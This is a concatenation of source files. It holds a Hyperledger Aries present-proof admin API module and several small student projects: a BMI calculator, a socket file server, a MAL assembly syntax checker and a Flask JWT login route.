description="Credential definition identifier",
required=True,
**INDY_CRED_DEF_ID
)
schema_id = fields.String(
description="Schema identifier", required=False, **INDY_SCHEMA_ID
)
schema_issuer_did = fields.String(
description="Schema issuer (origin) DID", required=False, **INDY_DID
)
schema_name = fields.String(
example="transcript", description="Schema name", required=False
)
schema_version = fields.String(
description="Schema version", required=False, **INDY_VERSION
)
issuer_did = fields.String(
description="Credential issuer DID", required=False, **INDY_DID
)
cred_def_id = fields.String(
description="Credential definition identifier",
required=False,
**INDY_CRED_DEF_ID
)
class IndyProofReqNonRevoked(Schema):
"""Non-revocation times specification in indy proof request."""
from_epoch = fields.Int(
description="Earliest epoch of interest for non-revocation proof",
required=True,
**INT_EPOCH
)
to_epoch = fields.Int(
description="Latest epoch of interest for non-revocation proof",
required=True,
**INT_EPOCH
)
class IndyProofReqAttrSpecSchema(Schema):
"""Schema for attribute specification in indy proof request."""
name = fields.String(
example="favouriteDrink", description="Attribute name", required=True
)
restrictions = fields.List(
fields.Nested(IndyProofReqSpecRestrictionsSchema()),
description="If present, credential must satisfy one of given restrictions",
required=False,
)
non_revoked = fields.Nested(IndyProofReqNonRevoked(), required=False)
class IndyProofReqPredSpecSchema(Schema):
"""Schema for predicate specification in indy proof request."""
name = fields.String(example="index", description="Attribute name", required=True)
    p_type = fields.String(
        description="Predicate type (indy currently supports only '>=')",
        required=True,
        **INDY_PREDICATE
    )
    p_value = fields.Integer(
        description="Threshold value", required=True,
    )
restrictions = fields.List(
fields.Nested(IndyProofReqSpecRestrictionsSchema()),
description="If present, credential must satisfy one of given restrictions",
required=False,
)
non_revoked = fields.Nested(IndyProofReqNonRevoked(), required=False)
class IndyProofRequestSchema(Schema):
"""Schema for indy proof request."""
nonce = fields.String(description="Nonce", required=False, example="1234567890")
name = fields.String(
description="Proof request name",
required=False,
example="Proof request",
default="Proof request",
)
version = fields.String(
description="Proof request version",
required=False,
default="1.0",
**INDY_VERSION
)
requested_attributes = fields.Dict(
description=("Requested attribute specifications of proof request"),
required=True,
keys=fields.Str(example="0_attr_uuid"), # marshmallow/apispec v3.0 ignores
values=fields.Nested(IndyProofReqAttrSpecSchema()),
)
requested_predicates = fields.Dict(
description=("Requested predicate specifications of proof request"),
required=True,
keys=fields.Str(example="0_age_GE_uuid"), # marshmallow/apispec v3.0 ignores
values=fields.Nested(IndyProofReqPredSpecSchema()),
)
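# A minimal request body satisfying IndyProofRequestSchema might look like the
# following sketch (the referent keys and the predicate threshold are
# illustrative only, echoing the field examples above):
#
# {
#     "name": "Proof request",
#     "version": "1.0",
#     "requested_attributes": {
#         "0_attr_uuid": {"name": "favouriteDrink"}
#     },
#     "requested_predicates": {
#         "0_age_GE_uuid": {"name": "index", "p_type": ">=", "p_value": 18}
#     }
# }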
class V10PresentationRequestRequestSchema(Schema):
"""Request schema for sending a proof request."""
connection_id = fields.UUID(
description="Connection identifier", required=True, example=UUIDFour.EXAMPLE,
)
proof_request = fields.Nested(IndyProofRequestSchema(), required=True)
comment = fields.Str(required=False)
class IndyRequestedCredsRequestedAttrSchema(Schema):
"""Schema for requested attributes within indy requested credentials structure."""
cred_id = fields.Str(
example="3fa85f64-5717-4562-b3fc-2c963f66afa6",
description=(
"Wallet credential identifier (typically but not necessarily a UUID)"
),
)
revealed = fields.Bool(
description="Whether to reveal attribute in proof", default=True
)
class IndyRequestedCredsRequestedPredSchema(Schema):
"""Schema for requested predicates within indy requested credentials structure."""
cred_id = fields.Str(
example="3<PASSWORD>",
description=(
"Wallet credential identifier (typically but not necessarily a UUID)"
),
)
class V10PresentationRequestSchema(Schema):
"""Request schema for sending a presentation."""
self_attested_attributes = fields.Dict(
description=("Self-attested attributes to build into proof"),
required=True,
keys=fields.Str(example="attr_name"), # marshmallow/apispec v3.0 ignores
values=fields.Str(
example="self_attested_value",
description=(
"Self-attested attribute values to use in requested-credentials "
"structure for proof construction"
),
),
)
requested_attributes = fields.Dict(
description=(
"Nested object mapping proof request attribute referents to "
"requested-attribute specifiers"
),
required=True,
keys=fields.Str(example="attr_referent"), # marshmallow/apispec v3.0 ignores
values=fields.Nested(IndyRequestedCredsRequestedAttrSchema()),
)
requested_predicates = fields.Dict(
description=(
"Nested object mapping proof request predicate referents to "
"requested-predicate specifiers"
),
required=True,
keys=fields.Str(example="pred_referent"), # marshmallow/apispec v3.0 ignores
values=fields.Nested(IndyRequestedCredsRequestedPredSchema()),
)
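# A filled-in V10PresentationRequestSchema body might look like the following
# sketch (the credential identifier is an illustrative placeholder taken from
# the field examples above):
#
# {
#     "self_attested_attributes": {"attr_name": "self_attested_value"},
#     "requested_attributes": {
#         "attr_referent": {
#             "cred_id": "3fa85f64-5717-4562-b3fc-2c963f66afa6",
#             "revealed": true
#         }
#     },
#     "requested_predicates": {
#         "pred_referent": {"cred_id": "3fa85f64-5717-4562-b3fc-2c963f66afa6"}
#     }
# }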
@docs(tags=["present-proof"], summary="Fetch all present-proof exchange records")
@response_schema(V10PresentationExchangeListSchema(), 200)
async def presentation_exchange_list(request: web.BaseRequest):
"""
Request handler for searching presentation exchange records.
Args:
request: aiohttp request object
Returns:
The presentation exchange list response
"""
context = request.app["request_context"]
tag_filter = {}
if "thread_id" in request.query and request.query["thread_id"] != "":
tag_filter["thread_id"] = request.query["thread_id"]
post_filter = {}
for param_name in (
"connection_id",
"role",
"state",
):
if param_name in request.query and request.query[param_name] != "":
post_filter[param_name] = request.query[param_name]
records = await V10PresentationExchange.query(context, tag_filter, post_filter)
return web.json_response({"results": [record.serialize() for record in records]})
@docs(tags=["present-proof"], summary="Fetch a single presentation exchange record")
@response_schema(V10PresentationExchangeSchema(), 200)
async def presentation_exchange_retrieve(request: web.BaseRequest):
"""
Request handler for fetching a single presentation exchange record.
Args:
request: aiohttp request object
Returns:
The presentation exchange record response
"""
context = request.app["request_context"]
presentation_exchange_id = request.match_info["pres_ex_id"]
try:
record = await V10PresentationExchange.retrieve_by_id(
context, presentation_exchange_id
)
except StorageNotFoundError:
raise web.HTTPNotFound()
return web.json_response(record.serialize())
@docs(
tags=["present-proof"],
summary="Fetch credentials for a presentation request from wallet",
parameters=[
{
"name": "start",
"in": "query",
"schema": {"type": "string"},
"required": False,
},
{
"name": "count",
"in": "query",
"schema": {"type": "string"},
"required": False,
},
{
"name": "extra_query",
"in": "query",
"schema": {"type": "string"},
"required": False,
},
],
)
async def presentation_exchange_credentials_list(request: web.BaseRequest):
"""
Request handler for searching applicable credential records.
Args:
request: aiohttp request object
Returns:
The credential list response
"""
context = request.app["request_context"]
presentation_exchange_id = request.match_info["pres_ex_id"]
referents = request.match_info.get("referent")
presentation_referents = referents.split(",") if referents else ()
try:
presentation_exchange_record = await V10PresentationExchange.retrieve_by_id(
context, presentation_exchange_id
)
except StorageNotFoundError:
raise web.HTTPNotFound()
start = request.query.get("start")
count = request.query.get("count")
# url encoded json extra_query
encoded_extra_query = request.query.get("extra_query") or "{}"
extra_query = json.loads(encoded_extra_query)
# defaults
start = int(start) if isinstance(start, str) else 0
count = int(count) if isinstance(count, str) else 10
holder: BaseHolder = await context.inject(BaseHolder)
credentials = await holder.get_credentials_for_presentation_request_by_referent(
presentation_exchange_record.presentation_request,
presentation_referents,
start,
count,
extra_query,
)
presentation_exchange_record.log_state(
context,
"Retrieved presentation credentials",
{
"presentation_exchange_id": presentation_exchange_id,
"referents": presentation_referents,
"extra_query": extra_query,
"credentials": credentials,
},
)
return web.json_response(credentials)
@docs(tags=["present-proof"], summary="Sends a presentation proposal")
@request_schema(V10PresentationProposalRequestSchema())
@response_schema(V10PresentationExchangeSchema(), 200)
async def presentation_exchange_send_proposal(request: web.BaseRequest):
"""
Request handler for sending a presentation proposal.
Args:
request: aiohttp request object
Returns:
The presentation exchange details
"""
context = request.app["request_context"]
outbound_handler = request.app["outbound_message_router"]
body = await request.json()
connection_id = body.get("connection_id")
try:
connection_record = await ConnectionRecord.retrieve_by_id(
context, connection_id
)
except StorageNotFoundError:
raise web.HTTPBadRequest()
if not connection_record.is_ready:
raise web.HTTPForbidden()
comment = body.get("comment")
# Aries#0037 calls it a proposal in the proposal struct but it's of type preview
presentation_preview = body.get("presentation_proposal")
presentation_proposal_message = PresentationProposal(
comment=comment,
presentation_proposal=PresentationPreview.deserialize(presentation_preview),
)
auto_present = body.get(
"auto_present", context.settings.get("debug.auto_respond_presentation_request")
)
presentation_manager = PresentationManager(context)
(
presentation_exchange_record
) = await presentation_manager.create_exchange_for_proposal(
connection_id=connection_id,
presentation_proposal_message=presentation_proposal_message,
auto_present=auto_present,
)
await outbound_handler(presentation_proposal_message, connection_id=connection_id)
return web.json_response(presentation_exchange_record.serialize())
@docs(
tags=["present-proof"],
summary="Sends a free presentation request not bound to any proposal",
)
@request_schema(V10PresentationRequestRequestSchema())
@response_schema(V10PresentationExchangeSchema(), 200)
async def presentation_exchange_send_free_request(request: web.BaseRequest):
"""
Request handler for sending a presentation request free from any proposal.
Args:
request: aiohttp request object
Returns:
The presentation exchange details
"""
context = request.app["request_context"]
outbound_handler = request.app["outbound_message_router"]
body = await request.json()
connection_id = body.get("connection_id")
try:
connection_record = await ConnectionRecord.retrieve_by_id(
context, connection_id
)
except StorageNotFoundError:
raise web.HTTPBadRequest()
if not connection_record.is_ready:
raise web.HTTPForbidden()
comment = body.get("comment")
indy_proof_request = body.get("proof_request")
if not indy_proof_request.get("nonce"):
indy_proof_request["nonce"] = str(uuid4().int)
presentation_request_message = PresentationRequest(
comment=comment,
request_presentations_attach=[
AttachDecorator.from_indy_dict(indy_proof_request)
],
)
presentation_manager = PresentationManager(context)
(
presentation_exchange_record
) = await presentation_manager.create_exchange_for_request(
connection_id=connection_id,
presentation_request_message=presentation_request_message,
)
await outbound_handler(presentation_request_message, connection_id=connection_id)
return web.json_response(presentation_exchange_record.serialize())
@docs(
tags=["present-proof"],
summary="Sends a presentation request in reference to a proposal",
)
@request_schema(V10PresentationRequestRequestSchema())
@response_schema(V10PresentationExchangeSchema(), 200)
async def presentation_exchange_send_bound_request(request: web.BaseRequest):
"""
    Request handler for sending a presentation request bound to a proposal.
Args:
request: aiohttp request object
Returns:
The presentation exchange details
"""
context = request.app["request_context"]
outbound_handler = request.app["outbound_message_router"]
presentation_exchange_id = request.match_info["pres_ex_id"]
presentation_exchange_record = await V10PresentationExchange.retrieve_by_id(
context, presentation_exchange_id
)
assert presentation_exchange_record.state == (
V10PresentationExchange.STATE_PROPOSAL_RECEIVED
)
body = await request.json()
connection_id = body.get("connection_id")
try:
connection_record = await ConnectionRecord.retrieve_by_id(
context, connection_id
)
except StorageNotFoundError:
raise web.HTTPBadRequest()
if not connection_record.is_ready:
raise web.HTTPForbidden()
presentation_manager = PresentationManager(context)
(
presentation_exchange_record,
presentation_request_message,
) = await presentation_manager.create_bound_request(presentation_exchange_record)
await outbound_handler(presentation_request_message, connection_id=connection_id)
return web.json_response(presentation_exchange_record.serialize())
@docs(tags=["present-proof"], summary="Sends a proof presentation")
@request_schema(V10PresentationRequestSchema())
@response_schema(V10PresentationExchangeSchema())
async def presentation_exchange_send_presentation(request: web.BaseRequest):
"""
Request handler for sending a presentation.
Args:
request: aiohttp request object
Returns:
The presentation exchange details
"""
context = request.app["request_context"]
outbound_handler = request.app["outbound_message_router"]
presentation_exchange_id = request.match_info["pres_ex_id"]
presentation_exchange_record = await V10PresentationExchange.retrieve_by_id(
context, presentation_exchange_id
)
body = await request.json()
connection_id = presentation_exchange_record.connection_id
try:
connection_record = await ConnectionRecord.retrieve_by_id(
context, connection_id
)
except StorageNotFoundError:
raise web.HTTPBadRequest()
if not connection_record.is_ready:
raise web.HTTPForbidden()
assert (
presentation_exchange_record.state
) == V10PresentationExchange.STATE_REQUEST_RECEIVED
presentation_manager = PresentationManager(context)
(
presentation_exchange_record,
presentation_message,
) = await presentation_manager.create_presentation(
presentation_exchange_record,
{
"self_attested_attributes": body.get("self_attested_attributes"),
"requested_attributes": body.get("requested_attributes"),
"requested_predicates": body.get("requested_predicates"),
},
comment=body.get("comment"),
)
await outbound_handler(presentation_message, connection_id=connection_id)
return web.json_response(presentation_exchange_record.serialize())
@docs(tags=["present-proof"], summary="Verify a received presentation")
@response_schema(V10PresentationExchangeSchema())
async def presentation_exchange_verify_presentation(request: web.BaseRequest):
"""
    Request handler for verifying a received presentation.
Args:
request: aiohttp request object
Returns:
The presentation exchange details
"""
context = request.app["request_context"]
presentation_exchange_id = request.match_info["pres_ex_id"]
presentation_exchange_record = await V10PresentationExchange.retrieve_by_id(
context, presentation_exchange_id
)
connection_id = presentation_exchange_record.connection_id
try:
connection_record = await ConnectionRecord.retrieve_by_id(
context, connection_id
)
except StorageNotFoundError:
raise web.HTTPBadRequest()
if not connection_record.is_ready:
raise web.HTTPForbidden()
assert (
presentation_exchange_record.state
) == V10PresentationExchange.STATE_PRESENTATION_RECEIVED
presentation_manager = PresentationManager(context)
presentation_exchange_record = await presentation_manager.verify_presentation(
presentation_exchange_record
)
return web.json_response(presentation_exchange_record.serialize())
@docs(
tags=["present-proof"], summary="Remove an existing presentation exchange record",
)
async def presentation_exchange_remove(request: web.BaseRequest):
"""
Request handler for removing a presentation exchange record.
Args:
request: aiohttp request object
"""
context = request.app["request_context"]
presentation_exchange_id = request.match_info["pres_ex_id"]
try:
presentation_exchange_record = await V10PresentationExchange.retrieve_by_id(
context, presentation_exchange_id
)
except StorageNotFoundError:
raise web.HTTPNotFound()
await presentation_exchange_record.delete_record(context)
return web.json_response({})
async def register(app: web.Application):
"""Register routes."""
app.add_routes(
[
web.get("/present-proof/records", presentation_exchange_list),
web.get(
"/present-proof/records/{pres_ex_id}", presentation_exchange_retrieve
),
web.get(
"/present-proof/records/{pres_ex_id}/credentials",
presentation_exchange_credentials_list,
),
web.get(
"/present-proof/records/{pres_ex_id}/credentials/{referent}",
presentation_exchange_credentials_list,
),
web.post(
"/present-proof/send-proposal", presentation_exchange_send_proposal,
),
web.post(
"/present-proof/send-request", presentation_exchange_send_free_request,
),
web.post(
"/present-proof/records/{pres_ex_id}/send-request",
presentation_exchange_send_bound_request,
),
web.post(
"/present-proof/records/{pres_ex_id}/send-presentation",
presentation_exchange_send_presentation,
),
web.post(
"/present-proof/records/{pres_ex_id}/verify-presentation",
presentation_exchange_verify_presentation,
),
web.post(
"/present-proof/records/{pres_ex_id}/remove",
presentation_exchange_remove,
),
]
)
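# register() is awaited by whatever builds the admin web app; a minimal
# (hypothetical) wiring is simply `await register(app)` on an aiohttp app.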
``` |
{
"source": "joseph-brennan/concept-code",
"score": 4
} |
#### File: Python/practice_code/BMI calc.py
```python
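# Imperial BMI, as computed in calcBmi below: weight_lb * 703 / height_in ** 2.
# Worked example: 150 lb at 6 ft (72 in) gives 150 * 703 / 72 ** 2 ≈ 20.34,
# which falls in the "optimal" band between the 18.5 and 25 cut-offs.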
class BMI:
def __init__(self):
self.weight = int(input("what is your weight? "))
self.height = 12 * int(input("what is your height in feet? "))
def calcBmi(self):
result = (self.weight * 703) / self.height ** 2
print("your BMI is {}".format(result))
if result < 18.5:
print("under weight")
elif result > 25:
print("over weight")
else:
print("optimal weight range")
if __name__ == '__main__':
bmi = BMI()
bmi.calcBmi()
```
#### File: Python/practice_code/ID.py
```python
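# Worked example (hypothetical input): first="Ada", last="Lovelace" prints
# initials "A L" and a length of 11, since full = "AdaLovelace" has no space.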
class ID:
def __init__(self):
self.first = input("what is your first name? ")
self.last = input("what is your last name? ")
def output(self):
full = self.first + self.last
print("your full name is {} {} with initials {} {} with length of {}".format(
self.first, self.last, self.first[0], self.last[0], len(full)))
if __name__ == '__main__':
idname = ID()
idname.output()
``` |
{
"source": "joseph-brennan/cs3700",
"score": 3
} |
#### File: cs3700/hw1/hw1Server.py
```python
import os
import socket
import threading
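# Minimal threaded file server: each accepted client is handled on its own
# thread and is expected to send a header of the form "Get\n<filename>"
# (a convention inferred from the parsing in loop() below, not a formal spec);
# matching files are streamed back in 1 KB chunks.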
class Server:
def __init__(self):
self.serverPort = 5010
self.socket = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
def connection(self):
self.socket.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
self.socket.bind(('', self.serverPort))
self.socket.listen(5)
print("The server is ready to receive")
while True:
connection_socket, address = self.socket.accept()
            threading.Thread(target=self.loop, args=(connection_socket, address)).start()
    def loop(self, connection_socket, address):
        # decode the raw bytes so the header can be compared as a string
        str_header = connection_socket.recv(1024).decode()
        if str_header == "NULL":
            connection_socket.close()
            return
        header = str_header.split('\n')
        if header[0] == "Get":
            if os.path.isfile(header[1]):
                # stream the requested file back in 1 KB chunks
                with open(header[1], 'rb') as f:
                    while True:
                        line = f.read(1024)
                        if not line:
                            break
                        connection_socket.send(line)
                connection_socket.close()
            else:
                print("404 Not Found")
                connection_socket.send("404 Not Found".encode())
                connection_socket.close()
        else:
            print("400 Bad Request")
            connection_socket.send("400 Bad Request".encode())
            connection_socket.close()
if __name__ == '__main__':
server1 = Server()
server1.connection()
``` |
{
"source": "joseph-brennan/PPL",
"score": 3
} |
#### File: PPL/Mal_checking/MAL Checking.py
```python
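# Sketch of the MAL source this checker accepts, inferred from the rules below
# (labels of at most 5 letters, octal immediates, registers R0-R7, ';' comments):
#   LOOP: MOVEI 10, R1    ; load octal immediate 10 into register R1
#         ADD R1, R2, R3
#         BEQ R1, R2, DONE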
import time
class MalChecking:
def __init__(self, file_name):
"""
initial set up of the language definition with the known syntax of MAL
        :param file_name: name of the MAL file to check
"""
# saved file name
self.file_name = file_name
try:
# open the Mal and log files
self.mal_file = open("{}.mal".format(file_name), 'r')
self.log = open("{}.log".format(file_name), 'w')
        except (FileNotFoundError, IOError):
            print("File not found; please enter a MAL file in this directory")
exit(1)
# known instruction codes in MAL
self.instruction = {1: "BR", 2: "BGT", 3: "BLT", 4: "BEQ", 5: "DIV", 6: "MUL",
7: "DEC", 8: "SUB", 9: "INC", 10: "ADD", 11: "MOVEI", 12: "MOVE"}
# available registers in MAL
self.register = {1: "R0", 2: "R1", 3: "R2", 4: "R3", 5: "R4", 6: "R5", 7: "R6", 8: "R7"}
# each key corresponds to the line where the error takes place
        # which holds the list of every error in that line
self.errors = {}
# current list of errors on the line
# copied to error dictionary
self.list = []
# the full line of code unedited
self.print_line = {}
# tracks the line numbers and uses them for keys
self.count = 0
# list of labels in code
self.label = []
# list of branch to memory locations
self.branch = {}
# count of each error that occurred in file
self.error_count = {"ill-formed label": 0, "invalid op_code": 0, "too many operands": 0,
"too few operands": 0, "ill-formed operands": 0,
"wrong operand type": 0, "label warnings": 0}
def read_file(self):
"""
        File parser: comments and blank lines are skipped but the line count is preserved; once the
        whole file has been read, branch targets are checked against the labels and the file is closed
:return: at end of file read and log write
"""
for i in self.mal_file:
line = i.strip()
self.count += 1
            # blank line; move forward
if line in ('\n', '\r\n', ''):
continue
# skip the comments
if line.startswith(";"):
continue
# known end of file
if line == "END":
break
else:
line = line.partition(';')
no_comment = i.partition(';')
self.print_line[self.count] = no_comment[0]
self.error_checking(line[0].strip())
self.branch_checker()
self.mal_file.close()
self.file_end()
def error_checking(self, line):
"""
        hands the current line of code down to every error check and saves the errors found for that line
        :param line: current non-empty line of code
        :return: when all checks on the line are finished, ready for the next line in the file
"""
self.bad_label(line)
self.errors[self.count] = self.list.copy()
self.list.clear()
def bad_label(self, line):
"""
        checks whether there is a label and, if so, verifies that the label is valid
        :param line: current line of code in its complete form
        :return: after all further error checks have run, or immediately if the line holds only a label
"""
label = line.partition(":")
# there is a label
if label[1] == ':':
# only a label
if label[2] == '':
if not label[0].isalpha():
self.list.append("** error: label can only contains letters")
self.error_count["ill-formed label"] += 1
elif len(label[0]) > 5:
self.list.append("** error: label can at most be 5 char long")
self.error_count["ill-formed label"] += 1
# valid label
else:
self.label.append(label[0])
return
# label on line
else:
if not label[0].isalpha():
self.list.append("** error: label can only contains letters")
self.error_count["ill-formed label"] += 1
elif len(label[0]) > 5:
self.list.append("** error: label can at most be 5 char long")
self.error_count["ill-formed label"] += 1
# valid label
else:
self.label.append(label[0])
self.invalid_op_code(label[2].strip())
return
# no label
else:
self.invalid_op_code(label[0].strip())
return
def invalid_op_code(self, line):
"""
        takes the current line of code, with any label already removed, and verifies that the instruction code is a valid MAL one
        :param line: current line of MAL without a label
        :return: all checks have been performed
"""
op_code = line.partition(" ")
if op_code[0] in self.instruction.values():
# valid op_code
self.bad_operands(line)
return
else:
self.list.append("** error: invalid op_code")
self.error_count["invalid op_code"] += 1
            # now checking for more than one error
self.bad_operands(line)
return
def bad_operands(self, line):
"""
splits out the instruction from its operands and checks that the op_code has the right number of operands
        :param line: instruction and its operands
        :return: this check and all deeper checks have been performed
"""
op_code = line.partition(" ")
operand = op_code[2].split(",")
operands = []
for op in operand:
operands.append(op.strip())
switch = 0
if op_code[0] in self.instruction.values():
for key in self.instruction.keys():
if self.instruction.get(key) == op_code[0]:
switch = key
# BR, DEC, and INC
if switch in (1, 7, 9):
if len(operands) > 1:
self.list.append("** error: can only have one input for {}".format(
self.instruction.get(switch)))
self.error_count["too many operands"] += 1
elif len(operands) < 1:
self.list.append("** error: needs one input for {}".format(self.instruction.get(switch)))
self.error_count["too few operands"] += 1
# MOVEI and MOVE
elif switch in (11, 12):
if len(operands) > 2:
self.list.append("** error: can only have two arguments in {}".format(
self.instruction.get(switch)))
self.error_count["too many operands"] += 1
elif len(operands) < 2:
self.list.append("** error: needs two inputs for {}".format(self.instruction.get(switch)))
self.error_count["too few operands"] += 1
# BGT, BLT, BEQ, DIV, MUL, SUB, and ADD
elif switch in (2, 3, 4, 5, 6, 8, 10):
if len(operands) > 3:
self.list.append("** error: can only have three arguments in {}".format(
self.instruction.get(switch)))
self.error_count["too many operands"] += 1
elif len(operands) < 3:
self.list.append("** error: needs three inputs for {}".format(self.instruction.get(switch)))
self.error_count["too few operands"] += 1
self.wrong_operands(op_code[0], operands)
return
def wrong_operands(self, op_code, operand):
"""
        using the instruction/operand split performed earlier, checks that each
        operand of the instruction is of the correct type
:param op_code: the instruction
:param operand: the operands for the instruction
:return: this and the last error check have been performed
"""
switch = 0
for key in self.instruction.keys():
if self.instruction.get(key) == op_code:
switch = key
# Move
if switch == 12:
try:
self.source_check(operand[0])
try:
self.destination_check(operand[1])
except IndexError:
self.list.append("** error: no destination")
self.error_count["ill-formed operands"] += 1
except IndexError:
self.list.append("** error: no source")
self.list.append("** error: no destination")
self.error_count["ill-formed operands"] += 1
# MOVEI
elif switch == 11:
try:
self.immediate_check(operand[0])
try:
self.destination_check(operand[1])
except IndexError:
self.list.append("** error: no destination")
self.error_count["ill-formed operands"] += 1
except IndexError:
self.list.append("** error: no source")
self.list.append("** error: no destination")
self.error_count["ill-formed operands"] += 1
# ADD or SUB or MUL or DIV
elif switch in (10, 8, 6, 5):
try:
self.source_check(operand[0])
try:
self.source_check(operand[1])
try:
self.destination_check(operand[2])
except IndexError:
self.list.append("** error: missing destination")
self.error_count["ill-formed operands"] += 1
except IndexError:
self.list.append("** error: second source missing")
self.list.append("** error: missing destination")
self.error_count["ill-formed operands"] += 1
except IndexError:
self.list.append("** error: first source missing")
self.list.append("** error: second source missing")
self.list.append("** error: missing destination")
self.error_count["ill-formed operands"] += 1
# INC or DEC
elif switch in (9, 7):
try:
self.source_check(operand[0])
except IndexError:
self.list.append("** error: missing source")
self.error_count["ill-formed operands"] += 1
# BEQ or BLT or BGT
elif switch in (4, 3, 2):
try:
self.source_check(operand[0])
try:
self.source_check(operand[1])
try:
self.label_check(operand[2])
except IndexError:
self.list.append("** error: missing label")
self.error_count["ill-formed operands"] += 1
except IndexError:
self.list.append("** error: missing second source")
self.list.append("** error: missing label")
self.error_count["ill-formed operands"] += 1
except IndexError:
self.list.append("** error: missing first source")
self.list.append("** error: missing second source")
self.list.append("** error: missing label")
self.error_count["ill-formed operands"] += 1
# BR
elif switch == 1:
try:
self.label_check(operand[0])
except IndexError:
self.list.append("** error: no label")
self.error_count["ill-formed operands"] += 1
self.warning_label(op_code, operand)
def warning_label(self, op_code, operand):
"""
        If the instruction is a branch, add its target to a dictionary keyed by the line number where the
        instruction is found, so that at the end of the file it can be compared against the labels seen in the file
:param op_code: what should be a branch instruction
:param operand: the operands of the instruction
:return: after saving the branch label for the end of the file
"""
# BR
if op_code == self.instruction.get(1):
try:
self.branch[self.count] = operand[0]
except IndexError:
pass
# BGT or BLT or BEQ
elif op_code in (self.instruction.get(4), self.instruction.get(3), self.instruction.get(2)):
try:
self.branch[self.count] = operand[2]
except IndexError:
pass
# check of source correctness
def source_check(self, source):
"""
checks that source operands are of the right type
:param source: a source operand
:return: after checking and writing to an error if it found one
"""
if source[0] == "R" and source[1].isdigit():
if source not in self.register.values():
self.list.append("** error: registers are only between 0 and 7")
self.error_count["wrong operand type"] += 1
return
elif source.lower().isalpha() is False:
self.list.append("** error: source can only contains letters")
self.error_count["wrong operand type"] += 1
return
elif len(source) > 5:
self.list.append("** error: source can at most be 5 char long")
self.error_count["wrong operand type"] += 1
return
# check of destination correctness
def destination_check(self, destination):
"""
        check that the destination operands are of the right type
        (almost the same as the source check, but it has a different error message to be more useful)
:param destination: a destination operand
:return: after checking and writing its error if it found one
"""
if destination[0] == "R" and destination[1].isdigit():
if destination not in self.register.values():
self.list.append("** error: registers are only between 0 and 7")
self.error_count["wrong operand type"] += 1
return
elif destination.isalpha() is False:
self.list.append("** error: destination can only contains letters")
self.error_count["wrong operand type"] += 1
return
elif len(destination) > 5:
self.list.append("** error: destination can at most be 5 char long")
self.error_count["wrong operand type"] += 1
return
# check of integer value
def immediate_check(self, immediate):
"""
checks that there is an octal immediate value
:param immediate: what should be an octal number
:return: after checking and writing an error if found
"""
if immediate.isdigit():
for number in immediate:
if int(number) > 7:
self.list.append("** error: number {} is not in octal format".format(number))
self.error_count["wrong operand type"] += 1
return
return
else:
self.list.append("** error: immediate value expected not register or memory location")
self.error_count["wrong operand type"] += 1
return
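    # Example sketch (hedged, not part of the original checker): immediate_check("17")
    # passes since every digit is in 0-7, while immediate_check("18") and
    # immediate_check("R1") each log a "wrong operand type" error.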
# check of label to branch
def label_check(self, label):
"""
        check that a branch label is a valid memory location; later the label is checked
        against the labels defined in the code
        :param label: a memory location
        :return: after checking the label and writing an error if one is found
"""
if not label.isalpha():
self.list.append("** error: {} memory location can only contains letters".format(label))
self.error_count["wrong operand type"] += 1
return
elif len(label) > 5:
self.list.append("** error: label {} can at most be 5 char long".format(label))
self.error_count["wrong operand type"] += 1
return
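    # Example sketch (hedged, not part of the original checker): label_check("loop")
    # passes, label_check("target") logs the length error, and label_check("L1")
    # logs the letters-only error.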
def branch_checker(self):
"""
        checks the valid labels in the code against the branch instruction labels after the whole file
        has been read, as the final error check
        :return: after writing an error if the label being branched to doesn't exist
"""
for key in self.branch.keys():
if self.branch.get(key) not in self.label:
self.errors[key].append("** error: branch {} is to label that isn't defined".format(
self.branch.get(key)))
self.error_count["label warnings"] += 1
def file_end(self):
"""
        this writes to the log file all the information that the error checking has gathered
        :return: finished writing and closed the log file
"""
self.log.write("MAL File Checker for: {}.mal log file, named {}.log, {}, By <NAME> CS 3210\n".format(
self.file_name, self.file_name, time.ctime()))
self.log.write("-------------------------------------------------------\n")
self.log.write("MAL Program Listing:MAL Program Listing:\n\n")
true_count = 0
for line in sorted(self.print_line.keys()):
true_count += 1
self.log.write("{}: {}\n".format(line, self.print_line.get(line)))
if line in self.errors.keys():
for error in self.errors.get(line):
self.log.write("{}\n".format(error))
self.log.write('\n')
self.log.write("-------------------------------------------------------\n")
count = 0
for key in sorted(self.error_count.keys()):
count += self.error_count.get(key)
self.log.write("total lines of code = {}\ntotal errors = {}\n".format(true_count, count))
for key in sorted(self.error_count.keys()):
self.log.write("{} {}\n".format(self.error_count.get(key), key))
self.log.write("Processing complete: ")
if count > 0:
self.log.write("MAL program is not valid.")
else:
self.log.write("MAL program is valid.")
self.log.close()
if __name__ == '__main__':
while True:
name = input("what is the name of the MAL file? ")
mal = MalChecking(name)
mal.read_file()
loop = input("Would you like to check another file Y/n? ")
if loop.lower() in ("no", "n"):
break
elif loop.strip() == "":
continue
elif loop.lower() not in ("yes", "y"):
print("error not a valid input shutting down")
exit(1)
else:
continue
``` |
{
"source": "joseph-brennan/smoke",
"score": 3
} |
#### File: smoke_backend/auth/views.py
```python
from flask import request, jsonify, Blueprint
from flask_jwt_extended import (
create_access_token,
create_refresh_token,
jwt_refresh_token_required,
jwt_required,
get_jwt_identity,
get_raw_jwt
)
from smoke_backend.models import User
from smoke_backend.extensions import pwd_context, jwt
blacklist = set()
blueprint = Blueprint('auth', __name__, url_prefix='/auth')
@blueprint.route('/login', methods=['POST'])
def login():
"""Authenticate user and return token.
    Uses flask's jsonify function to convert responses to valid JSON objects.
    [fjsonify]_
    Returns:
        flask.Response: If a valid request & credentials are present, returns
        the valid access tokens for the backend in JSON format.
        If the username or password is missing or invalid, the method
        returns a JSON formatted message noting how the method failed.
.. _Flask Local Proxy Request through werkzeug local:
http://werkzeug.pocoo.org/docs/0.14/wrappers/
"""
if not request.is_json:
return jsonify({"msg": "Missing JSON in request"}), 400
username = request.json.get('username', None)
password = request.json.get('password', None)
if not username or not password:
return jsonify({"msg": "Missing username or password"}), 400
user = User.query.filter_by(username=username).first()
if user is None or not pwd_context.verify(password, user.password):
return jsonify({"msg": "Bad credentials"}), 400
access_token = create_access_token(identity=user.id)
refresh_token = create_refresh_token(identity=user.id)
ret = {
'access_token': access_token,
'refresh_token': refresh_token
}
return jsonify(ret), 200
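# Example request sketch (hypothetical values, not part of the original module):
#   POST /auth/login  {"username": "admin", "password": "..."}
#   -> 200 {"access_token": "<jwt>", "refresh_token": "<jwt>"}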
@blueprint.route('/refresh', methods=['POST'])
@jwt_refresh_token_required
def refresh():
"""Receives access token and refreshes the page.
